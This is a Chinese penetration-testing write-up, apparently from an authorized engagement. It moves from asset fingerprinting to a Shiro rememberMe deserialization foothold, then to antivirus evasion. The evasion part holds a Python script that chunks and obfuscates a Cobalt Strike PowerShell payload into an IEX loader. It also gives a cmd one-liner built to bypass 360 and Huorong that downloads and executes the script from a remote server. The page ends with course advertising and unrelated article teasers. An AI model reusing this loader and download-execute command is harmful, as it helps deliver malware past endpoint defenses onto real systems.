1.信息收集

网址已无法访问,就不贴了

image.png

可以使用Fofa,火线,zoomeye,searchcode.com等爬取相关的资产,重点关注一些有漏洞暴露的框架和服务例如:泛微,PHP,Tomca,后台,weblogic等等。之后就主要分三步:指纹识别、漏洞验证、漏洞复现。

指纹识别很好理解,我们要拿历史漏洞怼它,首先要知道,它是什么有什么漏洞,不然你这怼半天,没有怼到点上,还容易被404警告(根据相关的指纹识别wappalyzer,云悉,Ehole,自建指纹库等等)。

指纹探测:https://github.com/EdgeSecurityTeam/EHole

1637115847_619467c7198c39bfbf51b.png

image.png

同时按需求和习惯把旗下50%以上控股的公司进行收集根域–到子域收集(layer,oneforall等等)

【一一帮助安全学习,所有资源获取处一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源

2.综合渗透分析脑图:

分享一个很细的工具集。
1637116057_61946899953acbee83f24.png

初步收集到大量资产识别某个目标是某个系统之后,需要针对该系统收集其历史漏洞情况,然后进行漏洞验证。所以漏洞验证部分需要两步,漏洞梳理和漏洞验证,漏洞梳理主要是从公开资料去收集目标系统相关的历史漏洞。

网络上有很多资料,比如 xxx 文库,github,还有免费开源的工具和 POC,比如 xray、nuclei,提供了很多漏洞验证的 POC,还有付费写的软件和平台;漏洞验证部分,尽量做到无害验证例如:挑个软的泛微云桥公开POC验证。
image.png

发现没有漏洞,就换个资产继续,渗透都是一步步来的。发现第一个漏洞——信息泄露,是一个好的开始,找到些配置信息仔细先记录下来,继续一步步扩大成果。

1637117676_61946eec200b2d38077ca.png

1637117690_61946efa5ea6135654193.png

本着以洞打洞原则:有一个漏洞必定有下一个漏洞进行这个域名更深的渗透–反查IP发现无CDN是真实IP直接全端口探测,(这里用的goby,全端口用nmap低速SYN扫描方式效果最好)。
image.png

image.png

去测试9090端口爆破没有结果,js,目录探测,右键源码等无结果继续换端口渗透。
image.png

换到8088端口跳转网站继续进行渗透。
1637118011_6194703b5f3df7b6911e9.png

跳转到http://xx.xxxxxx.com:8010/login继续抓包爆破发现shiro的特征rememberMe直接去验证:

Apache Shiro 在 Java 的权限及安全验证框架中占用重要的一席之地,在它编号为 550 的 issue 中爆出严重的 Java 反序列化漏洞。为了让浏览器或服务器重启后用户不丢失登录状态,Shiro 支持将持久化信息序列化并加密后保存在 Cookie 的 rememberMe 字段中,下次读取时进行解密再反序列化。

但是在 Shiro 1.2.4 版本之前内置了一个默认且固定的加密 Key,导致攻击者可以伪造任意的 rememberMe Cookie,进而触发反序列化漏洞。

Payload产生的过程:
命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。1637118126_619470aeab212bbde23f1.png

验证成功Windows单网卡并且出网。
1637118239_6194711f1425ed3068618.png

注意ping命令控制数量防止死ping。
image.png

发现360需要免杀绕过。
image.png

3.分离免杀:

杀毒软件的原理是根据特征、行为、基于云查杀,云查杀主要是根据特征码进行查杀,每一种杀毒软件都会检测头文件,所以可以进行程序段代码分离的形式,绕过当前主流杀软。

自己搭建一个Cobalt Strike运行客户端后选powershell脚本。
image.png

去挂载在公网。
image.png

混淆方法

首先将FromBase64String改成FromBase65String。

$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String("")
$s |foreach { $string = $string + $_.ToString()+','}
$string > c:\1.txt

将生成的编码分成两块或者多块再组合。

[Byte[]]$var_c1 =  [Byte[]](FromBase65String的代码)
[Byte[]]$var_c2 =  [Byte[]](FromBase65String的代码)
$var_code=$var_c1+$var_c2
$s=New-Object IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

完整脚本。

import requests
import re 
import sys
import threading
import os
import platform 
import subprocess 
import base64
def getkey(url): 
url=url
r = requests.get(url).text
key=re.findall(r'FromBase64String\(\"(.*)\"',r) 
str1 = ''.join(key) 
return str1
def get_bypass_txt(key):
file=open("keyword.txt",'w')
file.write(key)
file.close()
#os.system("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe   $string = '';$s = [Byte[]]$var_code = [System.Convert]::FromBase64String((Get-Content  keyword.txt));$s | foreach { $string = $string + $_.ToString()+','};$string > keyword2.txt")
with open("keyword.txt", "rb") as f:
data = f.read()
d = base64.b64decode(data)
with open("bypass.txt", "w+") as fw:
for x in d:
fw.write(str(x) + ",")
if __name__ == '__main__':
j=1 
k=0
url=input("输入cs文件地址:")
key=getkey(url)
get_bypass_txt(key)
with open('bypass.txt', 'r') as f1:
results = f1.read() 
str=results.split(',')
k=int(len(str))
chunk=int(input("请输入需要分的块数:"))
sum_chunk=k//chunk
for i in range(0,chunk):
#print(i+1)
if i==0:
new_str=str[0:sum_chunk]
s=",".join(new_str)
#print(s)
with open('poershell_bypass.txt','w') as f:
f.write("[Byte[]]$var_c%d =  [Byte[]](%s)\n"% (j,s))
j+=1
# print(new_str)
elif i+1<chunk:
new_str[i]=str[sum_chunk*i:sum_chunk*(i+1)] 
#print(new_str[i]) 
s = ",".join(new_str[i])
# print(s)
with open('poershell_bypass.txt', 'a+') as f:
f.write("[Byte[]]$var_c%d =  [Byte[]](%s)\n"% (j, s)) 
j += 1
elif i+1==chunk:
new_str[i]=str[sum_chunk*i:]
s = ",".join(new_str[i][:-1])
# print(s)
with open('poershell_bypass.txt', 'a+') as f:
f.write("[Byte[]]$var_c%d =  [Byte[]](%s)\n" % (j, s))
j += 1
for i in range(int(chunk)):
if i==0:
with open('poershell_bypass.txt', 'a+') as f:
f.write("$var_code=$var_c%d"%(i+1))
elif i<chunk-1:
with open('poershell_bypass.txt', 'a+') as f:
f.write("+$var_c%d" % (i + 1))
elif i ==chunk - 1: 
with open('poershell_bypass.txt', 'a+') as f:
f.write("+$var_c%d \n$s=New-Object IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()';IEX($A1+$a2)" % (i + 1))
print("poershell_bypass.txt已经生成完成!")

进行分离。
image.png

继续挂载在CS服务器上远程下载。
image.png

由于360和火绒对powershell命令会禁止调用,我们需要绕过360和火绒的禁止。

set aa=powers&& set bb=hell && cmd /c "echo set-alias -name test -value IEX;test(New-Object NeT."W`ebC`li`ent")."D`own`l`oadStr`ing"('ht'+'tP://192'+'.168.158.132:8888'+'/poershell_bypass.txt') | %aa%%bb% -"

image.png
image.png

这个点就到这。

继续把最后的一个端口测试完发现扫描有.DS_Store文件泄露http://43.2xx.xx.155:8012/.DS_Store,github上找个公开脚本进行枚举细心审计会发现更多问题。

image.png

这个ip这么多问题其他子域同样来一波果真这个段还有不少问题又找到两个弱口令。
image.png
image.png

4. 总结:

基于一次授权的渗透把一些思路整理一下,本次的重点在以洞打洞原则发现一个小洞顺藤摸瓜发现更多的高危甚至严重问题,像我们日常渗透有这样一步步思路进行收获都不小,当然了运气可以省很大部分时间和心思,一步到位的欧皇也是存在。

网络安全学习路线&学习资源在这里插入图片描述

网络安全的知识多而杂,怎么科学合理安排?

下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!

初级网工

1、网络安全理论知识(2天)

①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)

①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)

①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)

①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)

①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)

①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

“脚本小子”成长进阶资源领取

7、脚本编程(初级/中级/高级)

在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.

零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。

8、超级网工

这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。感兴趣的童鞋可以研究一下,不懂得地方可以【点这里】加我耗油,跟我学习交流一下。

网络安全工程师企业级学习路线

如图片过大被平台压缩导致看不清的话,可以【点这里】加我耗油发给你,大家也可以一起学习交流一下。

一些我自己买的、其他平台白嫖不到的视频教程:

需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。

网络安全学习路线&学习资源在这里插入图片描述

结语

网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。

特别声明:

此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!

# web安全 # 网络 # 安全 # 学习 # php
Logo
技术共进,成长同行——讯飞AI开发者社区

技术共进,成长同行——讯飞AI开发者社区

更多推荐

编程乐趣无限深度趣味项目解锁编程新境界

编程作为现代科技的重要组成部分,已经渗透到我们生活的方方面面。不论你是在开发手机应用、网站,还是参与人工智能的创新,编程的乐趣和挑战都在不断吸引着全球无数的开发者和程序员。对于初学者来说,编程可能看起来充满了复杂的代码和逻辑,但通过有趣且富有挑战性的项目,编程的世界也变得更加有趣!??在这篇文章中,我们将探讨一些有趣且富有创意的编程项目,不仅能帮助你提高编程技能,还能带你一步步进入编程的深度世界,

avatar 讯飞AI开发者社区

量子计算实战:2025算法开发指南

量子计算(QuantumComputing)正从实验室走向现实,预计到2025年,量子算法将在金融、医药、物流、人工智能等领域实现商业化应用。-量子计算机:使用量子比特(Qubit),可以同时处于0和1的叠加态(Superposition),并通过量子纠缠(Entanglement)实现并行计算。2025年,量子计算将从实验室走向产业应用,掌握量子算法开发将成为未来科技竞争的关键。🔹量子门(Qu

avatar 讯飞AI开发者社区

机器学习与深度学习

在机器学习中,经验通常以数据的形式存在,系统通过分析这些数据,构建出能够对新数据进行预测或决策的模型。深度学习则是机器学习的一个子领域,它基于人工神经网络,尤其是深度神经网络,通过多层次的非线性变换,从大规模数据中学习复杂的特征表示。卷积神经网络(CNN)在图像识别领域的突破性表现,循环神经网络(RNN)和长短时记忆网络(LSTM)在序列数据处理上的优势,以及Transformer架构在自然语言处

avatar 讯飞AI开发者社区